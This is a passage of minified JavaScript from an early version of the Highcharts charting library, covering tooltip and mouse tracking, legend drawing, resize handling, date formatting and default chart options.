ya=B.getLabelConfig();ya=D.call(ya);V=B.series;ca=za?ca:B.plotX;qa=za?qa:B.plotY;D=W(la?la[0]:va?Da-qa:ca);ca=W(la?la[1]:va?Aa-ca:qa);la=za||!B.series.isCartesian||gc(D,ca);if(ya===false||!la)x();else{if(xa){o.show();xa=false}ba.attr({text:ya});la=ba.getBBox();Oa=la.width+2*eb;R=la.height+2*eb;I.attr({width:Oa,height:R,stroke:p.borderColor||B.color||V.color||"#606060"});D=fe(Oa,R,X,ea,Da,Aa,{x:D,y:ca});w(W(D.x-ab),W(D.y-ab))}if(ta){ta=zc(ta);for(D=ta.length;D--;){ca=B.series[D? +"yAxis":"xAxis"];if(ta[D]&&ca){ca=ca.getPlotLinePath(B[D?"y":"x"],1);if(da[D])da[D].attr({d:ca,visibility:Ab});else{la={"stroke-width":ta[D].width||1,stroke:ta[D].color||"#C0C0C0",zIndex:2};if(ta[D].dashStyle)la.dashstyle=ta[D].dashStyle;da[D]=ga.path(ca).attr(la).add()}}}}},hide:x,destroy:function(){u(da,function(B){B&&B.destroy()});u([I,ba,o],function(B){B&&B.destroy()});I=ba=o=null}}}function f(p){function q(L){var s,o=Ud&&ua.width/ua.body.scrollWidth-1,I,ba,B;L=L||db.event;if(!L.target)L.target= +L.srcElement;s=L.touches?L.touches.item(0):L;if(L.type!=="mousemove"||db.opera||o){Jb=Fd(oa);I=Jb.left;ba=Jb.top}if(Pc){B=L.x;s=L.y}else if(s.layerX===Wa){B=s.pageX-I;s=s.pageY-ba}else{B=L.layerX;s=L.layerY}if(o){B+=W((o+1)*I-I);s+=W((o+1)*ba-ba)}return sa(L,{chartX:B,chartY:s})}function w(L){var s={xAxis:[],yAxis:[]};u(Va,function(o){var I=o.translate,ba=o.isXAxis;s[ba?"xAxis":"yAxis"].push({axis:o,value:I((va?!ba:ba)?L.chartX-X:Aa-L.chartY+ea,true)})});return s}function x(){var L=l.hoverSeries, +s=l.hoverPoint;s&&s.onMouseOut();L&&L.onMouseOut();hc&&hc.hide();sd=null}function V(){if(za){var L={xAxis:[],yAxis:[]},s=za.getBBox(),o=s.x-X,I=s.y-ea;if(Ma){u(Va,function(ba){var B=ba.translate,D=ba.isXAxis,ca=va?!D:D,la=B(ca?o:Aa-I-s.height,true,0,0,1);B=B(ca?o+s.width:Aa-I,true,0,0,1);L[D?"xAxis":"yAxis"].push({axis:ba,min:tb(la,B),max:Ia(la,B)})});Pa(l,"selection",L,td)}za=za.destroy()}l.mouseIsDown=ud=Ma=false;pb(ua,Kb?"touchend":"mouseup",V)}function N(L){var s=K(L.pageX)?L.pageX:L.page.x;L= +K(L.pageX)?L.pageY:L.page.y;Jb&&!gc(s-Jb.left-X,L-Jb.top-ea)&&x()}var ta,da,Ma,za,eb=z.zoomType,ab=/x/.test(eb),xa=/y/.test(eb),Oa=ab&&!va||xa&&va,R=xa&&!va||ab&&va;bd=function(){if(Ec){Ec.translate(X,ea);va&&Ec.attr({width:l.plotWidth,height:l.plotHeight}).invert()}else l.trackerGroup=Ec=ga.g("tracker").attr({zIndex:9}).add()};bd();if(p.enabled)l.tooltip=hc=e(p);(function(){oa.onmousedown=function(s){s=q(s);!Kb&&s.preventDefault&&s.preventDefault();l.mouseIsDown=ud=true;ta=s.chartX;da=s.chartY;Qa(ua, +Kb?"touchend":"mouseup",V)};var L=function(s){if(!(s&&s.touches&&s.touches.length>1)){s=q(s);if(!Kb)s.returnValue=false;var o=s.chartX,I=s.chartY,ba=!gc(o-X,I-ea);Jb||(Jb=Fd(oa));if(Kb&&s.type==="touchstart")if(Ga(s.target,"isTracker"))l.runTrackerClick||s.preventDefault();else!ke&&!ba&&s.preventDefault();if(ba){if(o<X)o=X;else if(o>X+Da)o=X+Da;if(I<ea)I=ea;else if(I>ea+Aa)I=ea+Aa}if(ud&&s.type!=="touchstart"){Ma=Math.sqrt(Math.pow(ta-o,2)+Math.pow(da-I,2));if(Ma>10){if(sc&&(ab||xa)&&gc(ta-X,da-ea))za|| +(za=ga.rect(X,ea,Oa?1:Da,R?1:Aa,0).attr({fill:z.selectionMarkerFill||"rgba(69,114,167,0.25)",zIndex:7}).add());if(za&&Oa){o=o-ta;za.attr({width:bb(o),x:(o>0?0:o)+ta})}if(za&&R){I=I-da;za.attr({height:bb(I),y:(I>0?0:I)+da})}}}else if(!ba){var B;I=l.hoverPoint;o=l.hoverSeries;var D,ca,la=$a,qa=va?s.chartY:s.chartX-X;if(hc&&p.shared){B=[];D=Ha.length;for(ca=0;ca<D;ca++)if(Ha[ca].visible&&Ha[ca].tooltipPoints.length){s=Ha[ca].tooltipPoints[qa];s._dist=bb(qa-s.plotX);la=tb(la,s._dist);B.push(s)}for(D= +B.length;D--;)B[D]._dist>la&&B.splice(D,1);if(B.length&&B[0].plotX!==sd){hc.refresh(B);sd=B[0].plotX}}if(o&&o.tracker)(s=o.tooltipPoints[qa])&&s!==I&&s.onMouseOver()}return ba||!sc}};oa.onmousemove=L;Qa(oa,"mouseleave",x);Qa(ua,"mousemove",N);oa.ontouchstart=function(s){if(ab||xa)oa.onmousedown(s);L(s)};oa.ontouchmove=L;oa.ontouchend=function(){Ma&&x()};oa.onclick=function(s){var o=l.hoverPoint;s=q(s);s.cancelBubble=true;if(!Ma)if(o&&Ga(s.target,"isTracker")){var I=o.plotX,ba=o.plotY;sa(o,{pageX:Jb.left+ +X+(va?Da-ba:I),pageY:Jb.top+ea+(va?Aa-I:ba)});Pa(o.series,"click",sa(s,{point:o}));o.firePointEvent("click",s)}else{sa(s,w(s));gc(s.chartX-X,s.chartY-ea)&&Pa(l,"click",s)}Ma=false}})();Vd=setInterval(function(){rd&&rd()},32);sa(this,{zoomX:ab,zoomY:xa,resetTracker:x,destroy:function(){if(l.trackerGroup)l.trackerGroup=Ec=l.trackerGroup.destroy();pb(ua,"mousemove",N);oa.onclick=oa.onmousedown=oa.onmousemove=oa.ontouchstart=oa.ontouchend=oa.ontouchmove=null}})}function g(p){var q=p.type||z.type||z.defaultSeriesType, +w=wb[q],x=l.hasRendered;if(x)if(va&&q==="column")w=wb.bar;else if(!va&&q==="bar")w=wb.column;q=new w;q.init(l,p);if(!x&&q.inverted)va=true;if(q.isCartesian)sc=q.isCartesian;Ha.push(q);return q}function h(){z.alignTicks!==false&&u(Va,function(p){p.adjustTickAmount()});Ob=null}function i(p){var q=l.isDirtyLegend,w,x=l.isDirtyBox,V=Ha.length,N=V,ta=l.clipRect;for(oc(p,l);N--;){p=Ha[N];if(p.isDirty&&p.options.stacking){w=true;break}}if(w)for(N=V;N--;){p=Ha[N];if(p.options.stacking)p.isDirty=true}u(Ha, +function(da){if(da.isDirty){da.cleanData();da.getSegments();if(da.options.legendType==="point")q=true}});if(q&&Fc.renderLegend){Fc.renderLegend();l.isDirtyLegend=false}if(sc){if(!cd){Ob=null;u(Va,function(da){da.setScale()})}h();Gc();u(Va,function(da){if(da.isDirty||x){da.redraw();x=true}})}if(x){vd();bd();if(ta){Hc(ta);ta.animate({width:l.plotSizeX,height:l.plotSizeY})}}u(Ha,function(da){if(da.isDirty&&da.visible&&(!da.isCartesian||da.xAxis))da.redraw()});Yb&&Yb.resetTracker&&Yb.resetTracker();Pa(l, +"redraw")}function j(){var p=a.xAxis||{},q=a.yAxis||{},w;p=zc(p);u(p,function(x,V){x.index=V;x.isX=true});q=zc(q);u(q,function(x,V){x.index=V});Va=p.concat(q);l.xAxis=[];l.yAxis=[];Va=tc(Va,function(x){w=new c(x);l[w.isXAxis?"xAxis":"yAxis"].push(w);return w});h()}function m(p,q){uc=Ca(a.title,p);Ic=Ca(a.subtitle,q);u([["title",p,uc],["subtitle",q,Ic]],function(w){var x=w[0],V=l[x],N=w[1];w=w[2];if(V&&N)V=V.destroy();if(w&&w.text&&!V)l[x]=ga.text(w.text,0,0,w.useHTML).attr({align:w.align,"class":"highcharts-"+ +x,zIndex:1}).css(w.style).add().align(w,false,Rb)})}function v(){qb=z.renderTo;Wd=vc+wd++;if(Sb(qb))qb=ua.getElementById(qb);qb.innerHTML="";if(!qb.offsetWidth){Zb=qb.cloneNode(0);Ja(Zb,{position:ic,top:"-9999px",display:""});ua.body.appendChild(Zb)}dd=(Zb||qb).offsetWidth;Jc=(Zb||qb).offsetHeight;l.chartWidth=$a=z.width||dd||600;l.chartHeight=cb=z.height||(Jc>19?Jc:400);l.container=oa=hb(Tb,{className:"highcharts-container"+(z.className?" "+z.className:""),id:Wd},sa({position:Xd,overflow:ob,width:$a+ +Ua,height:cb+Ua,textAlign:"left"},z.style),Zb||qb);l.renderer=ga=z.forExport?new ed(oa,$a,cb,true):new fd(oa,$a,cb);var p,q;if(Yd&&oa.getBoundingClientRect){p=function(){Ja(oa,{left:0,top:0});q=oa.getBoundingClientRect();Ja(oa,{left:-(q.left-ja(q.left))+Ua,top:-(q.top-ja(q.top))+Ua})};p();Qa(db,"resize",p);Qa(l,"destroy",function(){pb(db,"resize",p)})}}function P(){function p(){var w=z.width||qb.offsetWidth,x=z.height||qb.offsetHeight;if(w&&x){if(w!==dd||x!==Jc){clearTimeout(q);q=setTimeout(function(){xd(w, +x,false)},100)}dd=w;Jc=x}}var q;Qa(db,"resize",p);Qa(l,"destroy",function(){pb(db,"resize",p)})}function T(){Pa(l,"endResize",null,function(){cd-=1})}function Y(){var p=a.labels,q=a.credits,w;m();Fc=l.legend=new le;Gc();u(Va,function(x){x.setTickPositions(true)});h();Gc();vd();sc&&u(Va,function(x){x.render()});if(!l.seriesGroup)l.seriesGroup=ga.g("series-group").attr({zIndex:3}).add();u(Ha,function(x){x.translate();x.setTooltipPoints();x.render()});p.items&&u(p.items,function(){var x=sa(p.style,this.style), +V=ja(x.left)+X,N=ja(x.top)+ea+12;delete x.left;delete x.top;ga.text(this.html,V,N).attr({zIndex:2}).css(x).add()});if(!l.toolbar)l.toolbar=d();if(q.enabled&&!l.credits){w=q.href;l.credits=ga.text(q.text,0,0).on("click",function(){if(w)location.href=w}).attr({align:q.position.align,zIndex:8}).css(q.style).add().align(q.position)}bd();l.hasRendered=true;if(Zb){qb.appendChild(oa);pc(Zb)}}function H(){var p,q=oa&&oa.parentNode;if(l!==null){Pa(l,"destroy");pb(db,"unload",H);pb(l);for(p=Va.length;p--;)Va[p]= +Va[p].destroy();for(p=Ha.length;p--;)Ha[p]=Ha[p].destroy();u(["title","subtitle","seriesGroup","clipRect","credits","tracker"],function(w){var x=l[w];if(x)l[w]=x.destroy()});u([wc,xc,Kc,Fc,hc,ga,Yb],function(w){w&&w.destroy&&w.destroy()});wc=xc=Kc=Fc=hc=ga=Yb=null;if(oa){oa.innerHTML="";pb(oa);q&&pc(oa);oa=null}clearInterval(Vd);for(p in l)delete l[p];l=null}}function U(){if(!Lc&&db==db.top&&ua.readyState!=="complete")ua.attachEvent("onreadystatechange",function(){ua.detachEvent("onreadystatechange", +U);ua.readyState==="complete"&&U()});else{v();yd();zd();u(a.series||[],function(p){g(p)});l.inverted=va=A(va,a.chart.inverted);j();l.render=Y;l.tracker=Yb=new f(a.tooltip);Y();Pa(l,"load");b&&b.apply(l,[l]);u(l.callbacks,function(p){p.apply(l,[l])})}}Yc=Ca(Yc,Xa.xAxis);od=Ca(od,Xa.yAxis);Xa.xAxis=Xa.yAxis=null;a=Ca(Xa,a);var z=a.chart,M=z.margin;M=Nb(M)?M:[M,M,M,M];var y=A(z.marginTop,M[0]),C=A(z.marginRight,M[1]),Z=A(z.marginBottom,M[2]),Sa=A(z.marginLeft,M[3]),Na=z.spacingTop,Ea=z.spacingRight, +gb=z.spacingBottom,Lb=z.spacingLeft,Rb,uc,Ic,ea,Ib,vb,X,Xb,qb,Zb,oa,Wd,dd,Jc,$a,cb,qd,ad,wc,Kc,Ad,xc,l=this,ke=(M=z.events)&&!!M.click,Bd,gc,hc,ud,jc,Zd,Cd,Aa,Da,Yb,Ec,bd,Fc,$b,ac,Jb,sc=z.showAxes,cd=0,Va=[],Ob,Ha=[],va,ga,rd,Vd,sd,vd,Gc,yd,zd,xd,td,$d,le=function(){function p(G,ha){var na=G.legendItem,Ra=G.legendLine,La=G.legendSymbol,pa=Oa.color,wa=ha?N.itemStyle.color:pa,zb=ha?G.color:pa;pa=ha?G.pointAttr[ib]:{stroke:pa,fill:pa};na&&na.css({fill:wa});Ra&&Ra.attr({stroke:zb});La&&La.attr(pa)}function q(G, +ha,na){var Ra=G.legendItem,La=G.legendLine,pa=G.legendSymbol;G=G.checkbox;Ra&&Ra.attr({x:ha,y:na});La&&La.translate(ha,na-4);pa&&pa.attr({x:ha+pa.xOff,y:na+pa.yOff});if(G){G.x=ha;G.y=na}}function w(){u(za,function(G){var ha=G.checkbox,na=qa.alignAttr;ha&&Ja(ha,{left:na.translateX+G.legendItemWidth+ha.x-40+Ua,top:na.translateY+ha.y-11+Ua})})}function x(G){var ha,na,Ra,La,pa=G.legendItem;La=G.series||G;var wa=La.options,zb=wa&&wa.borderWidth||0;if(!pa){La=/^(bar|pie|area|column)$/.test(La.type);G.legendItem= +pa=ga.text(N.labelFormatter.call(G),0,0).css(G.visible?ab:Oa).on("mouseover",function(){G.setState(Bb);pa.css(xa)}).on("mouseout",function(){pa.css(G.visible?ab:Oa);G.setState()}).on("click",function(){var Gb=function(){G.setVisible()};G.firePointEvent?G.firePointEvent("legendItemClick",null,Gb):Pa(G,"legendItemClick",null,Gb)}).attr({zIndex:2}).add(qa);if(!La&&wa&&wa.lineWidth){var Vb={"stroke-width":wa.lineWidth,zIndex:2};if(wa.dashStyle)Vb.dashstyle=wa.dashStyle;G.legendLine=ga.path([Za,-da-Ma, +0,Ka,-Ma,0]).attr(Vb).add(qa)}if(La)ha=ga.rect(na=-da-Ma,Ra=-11,da,12,2).attr({zIndex:3}).add(qa);else if(wa&&wa.marker&&wa.marker.enabled)ha=ga.symbol(G.symbol,na=-da/2-Ma,Ra=-4,wa.marker.radius).attr({zIndex:3}).add(qa);if(ha){ha.xOff=na+zb%2/2;ha.yOff=Ra+zb%2/2}G.legendSymbol=ha;p(G,G.visible);if(wa&&wa.showCheckbox){G.checkbox=hb("input",{type:"checkbox",checked:G.selected,defaultChecked:G.selected},N.itemCheckboxStyle,oa);Qa(G.checkbox,"click",function(Gb){Pa(G,"checkboxClick",{checked:Gb.target.checked}, +function(){G.select()})})}}ha=pa.getBBox();na=G.legendItemWidth=N.itemWidth||da+Ma+ha.width+R;B=ha.height;if(ta&&o-s+na>(fb||$a-2*R-s)){o=s;I+=B}ba=I;q(G,o,I);if(ta)o+=na;else I+=B;ya=fb||Ia(ta?o-s:na,ya)}function V(){o=s;I=L;ba=ya=0;qa||(qa=ga.g("legend").attr({zIndex:7}).add());za=[];u(Hb,function(Ra){var La=Ra.options;if(La.showInLegend)za=za.concat(La.legendType==="point"?Ra.data:Ra)});Hd(za,function(Ra,La){return(Ra.options.legendIndex||0)-(La.options.legendIndex||0)});cc&&za.reverse();u(za, +x);$b=fb||ya;ac=ba-L+B;if(ca||la){$b+=2*R;ac+=2*R;if(D){if($b>0&&ac>0){D[D.isNew?"attr":"animate"](D.crisp(null,null,null,$b,ac));D.isNew=false}}else{D=ga.rect(0,0,$b,ac,N.borderRadius,ca||0).attr({stroke:N.borderColor,"stroke-width":ca||0,fill:la||jb}).add(qa).shadow(N.shadow);D.isNew=true}D[za.length?"show":"hide"]()}for(var G=["left","right","top","bottom"],ha,na=4;na--;){ha=G[na];if(eb[ha]&&eb[ha]!=="auto"){N[na<2?"align":"verticalAlign"]=ha;N[na<2?"x":"y"]=ja(eb[ha])*(na%2?-1:1)}}za.length&& +qa.align(sa(N,{width:$b,height:ac}),true,Rb);cd||w()}var N=l.options.legend;if(N.enabled){var ta=N.layout==="horizontal",da=N.symbolWidth,Ma=N.symbolPadding,za,eb=N.style,ab=N.itemStyle,xa=N.itemHoverStyle,Oa=N.itemHiddenStyle,R=ja(eb.padding),L=18,s=4+R+da+Ma,o,I,ba,B=0,D,ca=N.borderWidth,la=N.backgroundColor,qa,ya,fb=N.width,Hb=l.series,cc=N.reversed;V();Qa(l,"endResize",w);return{colorizeItem:p,destroyItem:function(G){var ha=G.checkbox;u(["legendItem","legendLine","legendSymbol"],function(na){G[na]&& +G[na].destroy()});ha&&pc(G.checkbox)},renderLegend:V,destroy:function(){if(D)D=D.destroy();if(qa)qa=qa.destroy()}}}};gc=function(p,q){return p>=0&&p<=Da&&q>=0&&q<=Aa};$d=function(){Pa(l,"selection",{resetSelection:true},td);l.toolbar.remove("zoom")};td=function(p){var q=Xa.lang,w=l.pointCount<100;l.toolbar.add("zoom",q.resetZoom,q.resetZoomTitle,$d);!p||p.resetSelection?u(Va,function(x){x.setExtremes(null,null,false,w)}):u(p.xAxis.concat(p.yAxis),function(x){var V=x.axis;if(l.tracker[V.isXAxis?"zoomX": +"zoomY"])V.setExtremes(x.min,x.max,false,w)});i()};Gc=function(){var p=a.legend,q=A(p.margin,10),w=p.x,x=p.y,V=p.align,N=p.verticalAlign,ta;yd();if((l.title||l.subtitle)&&!K(y))if(ta=Ia(l.title&&!uc.floating&&!uc.verticalAlign&&uc.y||0,l.subtitle&&!Ic.floating&&!Ic.verticalAlign&&Ic.y||0))ea=Ia(ea,ta+A(uc.margin,15)+Na);if(p.enabled&&!p.floating)if(V==="right")K(C)||(Ib=Ia(Ib,$b-w+q+Ea));else if(V==="left")K(Sa)||(X=Ia(X,$b+w+q+Lb));else if(N==="top")K(y)||(ea=Ia(ea,ac+x+q+Na));else if(N==="bottom")K(Z)|| +(vb=Ia(vb,ac-x+q+gb));sc&&u(Va,function(da){da.getOffset()});K(Sa)||(X+=Xb[3]);K(y)||(ea+=Xb[0]);K(Z)||(vb+=Xb[2]);K(C)||(Ib+=Xb[1]);zd()};xd=function(p,q,w){var x=l.title,V=l.subtitle;cd+=1;oc(w,l);ad=cb;qd=$a;l.chartWidth=$a=W(p);l.chartHeight=cb=W(q);Ja(oa,{width:$a+Ua,height:cb+Ua});ga.setSize($a,cb,w);Da=$a-X-Ib;Aa=cb-ea-vb;Ob=null;u(Va,function(N){N.isDirty=true;N.setScale()});u(Ha,function(N){N.isDirty=true});l.isDirtyLegend=true;l.isDirtyBox=true;Gc();x&&x.align(null,null,Rb);V&&V.align(null, +null,Rb);i(w);ad=null;Pa(l,"resize");Bc===false?T():setTimeout(T,Bc&&Bc.duration||500)};zd=function(){l.plotLeft=X=W(X);l.plotTop=ea=W(ea);l.plotWidth=Da=W($a-X-Ib);l.plotHeight=Aa=W(cb-ea-vb);l.plotSizeX=va?Aa:Da;l.plotSizeY=va?Da:Aa;Rb={x:Lb,y:Na,width:$a-Lb-Ea,height:cb-Na-gb}};yd=function(){ea=A(y,Na);Ib=A(C,Ea);vb=A(Z,gb);X=A(Sa,Lb);Xb=[0,0,0,0]};vd=function(){var p=z.borderWidth||0,q=z.backgroundColor,w=z.plotBackgroundColor,x=z.plotBackgroundImage,V,N={x:X,y:ea,width:Da,height:Aa};V=p+(z.shadow? +8:0);if(p||q)if(wc)wc.animate(wc.crisp(null,null,null,$a-V,cb-V));else wc=ga.rect(V/2,V/2,$a-V,cb-V,z.borderRadius,p).attr({stroke:z.borderColor,"stroke-width":p,fill:q||jb}).add().shadow(z.shadow);if(w)if(Kc)Kc.animate(N);else Kc=ga.rect(X,ea,Da,Aa,0).attr({fill:w}).add().shadow(z.plotShadow);if(x)if(Ad)Ad.animate(N);else Ad=ga.image(x,X,ea,Da,Aa).add();if(z.plotBorderWidth)if(xc)xc.animate(xc.crisp(null,X,ea,Da,Aa));else xc=ga.rect(X,ea,Da,Aa,0,z.plotBorderWidth).attr({stroke:z.plotBorderColor, +"stroke-width":z.plotBorderWidth,zIndex:4}).add();l.isDirtyBox=false};Qa(db,"unload",H);z.reflow!==false&&Qa(l,"load",P);if(M)for(Bd in M)Qa(l,Bd,M[Bd]);l.options=a;l.series=Ha;l.addSeries=function(p,q,w){var x;if(p){oc(w,l);q=A(q,true);Pa(l,"addSeries",{options:p},function(){x=g(p);x.isDirty=true;l.isDirtyLegend=true;q&&l.redraw()})}return x};l.animation=A(z.animation,true);l.destroy=H;l.get=function(p){var q,w,x;for(q=0;q<Va.length;q++)if(Va[q].options.id===p)return Va[q];for(q=0;q<Ha.length;q++)if(Ha[q].options.id=== +p)return Ha[q];for(q=0;q<Ha.length;q++){x=Ha[q].data;for(w=0;w<x.length;w++)if(x[w].id===p)return x[w]}return null};l.getSelectedPoints=function(){var p=[];u(Ha,function(q){p=p.concat(Dd(q.data,function(w){return w.selected}))});return p};l.getSelectedSeries=function(){return Dd(Ha,function(p){return p.selected})};l.hideLoading=function(){gd(jc,{opacity:0},{duration:a.loading.hideDuration,complete:function(){Ja(jc,{display:jb})}});Cd=false};l.isInsidePlot=gc;l.redraw=i;l.setSize=xd;l.setTitle=m;l.showLoading= +function(p){var q=a.loading;if(!jc){jc=hb(Tb,{className:"highcharts-loading"},sa(q.style,{left:X+Ua,top:ea+Ua,width:Da+Ua,height:Aa+Ua,zIndex:10,display:jb}),oa);Zd=hb("span",null,q.labelStyle,jc)}Zd.innerHTML=p||a.lang.loading;if(!Cd){Ja(jc,{opacity:0,display:""});gd(jc,{opacity:q.style.opacity},{duration:q.showDuration});Cd=true}};l.pointCount=0;l.counters=new Gd;U()}var ua=document,db=window,Fa=Math,W=Fa.round,lb=Fa.floor,md=Fa.ceil,Ia=Fa.max,tb=Fa.min,bb=Fa.abs,rb=Fa.cos,Cb=Fa.sin,kc=Fa.PI,ae= +kc*2/360,yc=navigator.userAgent,Pc=/msie/i.test(yc)&&!db.opera,Mc=ua.documentMode===8,Ud=/AppleWebKit/.test(yc),Yd=/Firefox/.test(yc),Lc=!!ua.createElementNS&&!!ua.createElementNS("http://www.w3.org/2000/svg","svg").createSVGRect,me=Yd&&parseInt(yc.split("Firefox/")[1],10)<4,fd,Kb=ua.documentElement.ontouchstart!==undefined,be={},wd=0,ub=1,Tc,Xa,Zc,Bc,Nc,Wa,Tb="div",ic="absolute",Xd="relative",ob="hidden",vc="highcharts-",Ab="visible",Ua="px",jb="none",Za="M",Ka="L",ce="rgba(192,192,192,"+(Lc?1.0E-6: +0.0020)+")",ib="",Bb="hover",Qc,id,jd,kd,Cc,Rc,Sc,Jd,Kd,ld,Ld,Md,ma=db.HighchartsAdapter,Db=ma||{},u=Db.each,Dd=Db.grep,tc=Db.map,Ca=Db.merge,Qa=Db.addEvent,pb=Db.removeEvent,Pa=Db.fireEvent,gd=Db.animate,Hc=Db.stop,wb={};Zc=function(a,b,c){function d(P){return P.toString().replace(/^([0-9])$/,"0$1")}if(!K(b)||isNaN(b))return"Invalid date";a=A(a,"%Y-%m-%d %H:%M:%S");b=new Date(b*ub);var e,f=b[jd](),g=b[kd](),h=b[Cc](),i=b[Rc](),j=b[Sc](),m=Xa.lang,v=m.weekdays;b={a:v[g].substr(0,3),A:v[g],d:d(h), +e:h,b:m.shortMonths[i],B:m.months[i],m:d(i+1),y:j.toString().substr(2,2),Y:j,H:d(f),I:d(f%12||12),l:f%12||12,M:d(b[id]()),p:f<12?"AM":"PM",P:f<12?"am":"pm",S:d(b.getSeconds())};for(e in b)a=a.replace("%"+e,b[e]);return c?a.substr(0,1).toUpperCase()+a.substr(1):a};Gd.prototype={wrapColor:function(a){if(this.color>=a)this.color=0},wrapSymbol:function(a){if(this.symbol>=a)this.symbol=0}};Nc={init:function(a,b,c){b=b||"";var d=a.shift,e=b.indexOf("C")>-1,f=e?7:3,g;b=b.split(" ");c=[].concat(c);var h, +i,j=function(m){for(g=m.length;g--;)m[g]===Za&&m.splice(g+1,0,m[g+1],m[g+2],m[g+1],m[g+2])};if(e){j(b);j(c)}if(a.isArea){h=b.splice(b.length-6,6);i=c.splice(c.length-6,6)}if(d){c=[].concat(c).splice(0,f).concat(c);a.shift=false}if(b.length)for(a=c.length;b.length<a;){d=[].concat(b).splice(b.length-f,f);if(e){d[f-6]=d[f-2];d[f-5]=d[f-1]}b=b.concat(d)}if(h){b=b.concat(h);c=c.concat(i)}return[b,c]},step:function(a,b,c,d){var e=[],f=a.length;if(c===1)e=d;else if(f===b.length&&c<1)for(;f--;){d=parseFloat(a[f]); +e[f]=isNaN(d)?a[f]:c*parseFloat(b[f]-d)+d}else e=b;return e}};ma&&ma.init&&ma.init(Nc);if(!ma&&db.jQuery){var Mb=jQuery;u=function(a,b){for(var c=0,d=a.length;c<d;c++)if(b.call(a[c],a[c],c,a)===false)return c};Dd=Mb.grep;tc=function(a,b){for(var c=[],d=0,e=a.length;d<e;d++)c[d]=b.call(a[d],a[d],d,a);return c};Ca=function(){var a=arguments;return Mb.extend(true,null,a[0],a[1],a[2],a[3])};Qa=function(a,b,c){Mb(a).bind(b,c)};pb=function(a,b,c){var d=ua.removeEventListener?"removeEventListener":"detachEvent"; +if(ua[d]&&!a[d])a[d]=function(){};Mb(a).unbind(b,c)};Pa=function(a,b,c,d){var e=Mb.Event(b),f="detached"+b;sa(e,c);if(a[b]){a[f]=a[b];a[b]=null}Mb(a).trigger(e);if(a[f]){a[b]=a[f];a[f]=null}d&&!e.isDefaultPrevented()&&d(e)};gd=function(a,b,c){var d=Mb(a);if(b.d){a.toD=b.d;b.d=1}d.stop();d.animate(b,c)};Hc=function(a){Mb(a).stop()};Mb.extend(Mb.easing,{easeOutQuad:function(a,b,c,d,e){return-d*(b/=e)*(b-2)+c}});var de=jQuery.fx,ee=de.step;u(["cur","_default","width","height"],function(a,b){var c=b? +ee:de.prototype,d=c[a],e;if(d)c[a]=function(f){f=b?f:this;e=f.elem;return e.attr?e.attr(f.prop,f.now):d.apply(this,arguments)}});ee.d=function(a){var b=a.elem;if(!a.started){var c=Nc.init(b,b.d,b.toD);a.start=c[0];a.end=c[1];a.started=true}b.attr("d",Nc.step(a.start,a.end,a.pos,b.toD))}}ma={enabled:true,align:"center",x:0,y:15,style:{color:"#666",fontSize:"11px",lineHeight:"14px"}};Xa={colors:["#4572A7","#AA4643","#89A54E","#80699B","#3D96AE","#DB843D","#92A8CD","#A47D7C","#B5CA92"],symbols:["circle", +"diamond","square","triangle","triangle-down"],lang:{loading:"Loading...",months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","June","Jul","Aug","Sep","Oct","Nov","Dec"],weekdays:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],decimalPoint:".",resetZoom:"Reset zoom",resetZoomTitle:"Reset zoom level 1:1",thousandsSep:","},global:{useUTC:true},chart:{borderColor:"#4572A7", +borderRadius:5,defaultSeriesType:"line",ignoreHiddenSeries:true,spacingTop:10,spacingRight:10,spacingBottom:15,spacingLeft:10,style:{fontFamily:'"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif',fontSize:"12px"},backgroundColor:"#FFFFFF",plotBorderColor:"#C0C0C0"},title:{text:"Chart title",align:"center",y:15,style:{color:"#3E576F",fontSize:"16px"}},subtitle:{text:"",align:"center",y:30,style:{color:"#6D869F"}},plotOptions:{line:{allowPointSelect:false,showCheckbox:false, +animation:{duration:1E3},events:{},lineWidth:2,shadow:true,marker:{enabled:true,lineWidth:0,radius:4,lineColor:"#FFFFFF",states:{hover:{},select:{fillColor:"#FFFFFF",lineColor:"#000000",lineWidth:2}}},point:{events:{}},dataLabels:Ca(ma,{enabled:false,y:-6,formatter:function(){return this.y}}),showInLegend:true,states:{hover:{marker:{}},select:{marker:{}}},stickyTracking:true}},labels:{style:{position:ic,color:"#3E576F"}},legend:{enabled:true,align:"center",layout:"horizontal",labelFormatter:function(){return this.name}, +borderWidth:1,borderColor:"#909090",borderRadius:5,shadow:false,style:{padding:"5px"},itemStyle:{cursor:"pointer",color:"#3E576F"},itemHoverStyle:{cursor:"pointer",color:"#000000"},itemHiddenStyle:{color:"#C0C0C0"},itemCheckboxStyle:{position:ic,width:"13px",height:"13px"},symbolWidth:16,symbolPadding:5,verticalAlign:"bottom",x:0,y:0},loading:{hideDuration:100,labelStyle:{fontWeight:"bold",position:Xd,top:"1em"},showDuration:100,style:{position:ic,backgroundColor:"white",opacity:0.5,textAlign:"center"}}, +tooltip:{enabled:true,backgroundColor:"rgba(255, 255, 255, .85)",borderWidth:2,borderRadius:5,shadow:true,snap:Kb?25:10,style:{color:"#333333",fontSize:"12px",padding:"5px",whiteSpace:"nowrap"}},toolbar:{itemStyle:{color:"#4572A7",cursor:"pointer"}},credits:{enabled:true,text:"Highcharts.com",href:"http://www.highcharts.com",position:{align:"right",x:-10,verticalAlign:"bottom",y:-5},style:{cursor:"pointer",color:"#909090",fontSize:"10px"}}};var Yc={dateTimeLabelFormats:{second:"%H:%M:%S",minute:"%H:%M", +hour:"%H:%M",day:"%e. %b",week:"%e. %b",month:"%b '%y",year:"%Y"},endOnTick:false,gridLineColor:"#C0C0C0",labels:ma,lineColor:"#C0D0E0",lineWidth:1,max:null,min:null,minPadding:0.01,maxPadding:0.01,minorGridLineColor:"#E0E0E0",minorGridLineWidth:1,minorTickColor:"#A0A0A0",minorTickLength:2,minorTickPosition:"outside",startOfWeek:1,startOnTick:false,tickColor:"#C0D0E0",tickLength:5,tickmarkPlacement:"between",tickPixelInterval:100,tickPosition:"outside",tickWidth:1,title:{align:"middle",style:{color:"#6D869F", +fontWeight:"bold"}},type:"linear"},od=Ca(Yc,{endOnTick:true,gridLineWidth:1,tickPixelInterval:72,showLastLabel:true,labels:{align:"right",x:-8,y:3},lineWidth:0,maxPadding:0.05,minPadding:0.05,startOnTick:true,tickWidth:0,title:{rotation:270,text:"Y-values"},stackLabels:{enabled:false,formatter:function(){return 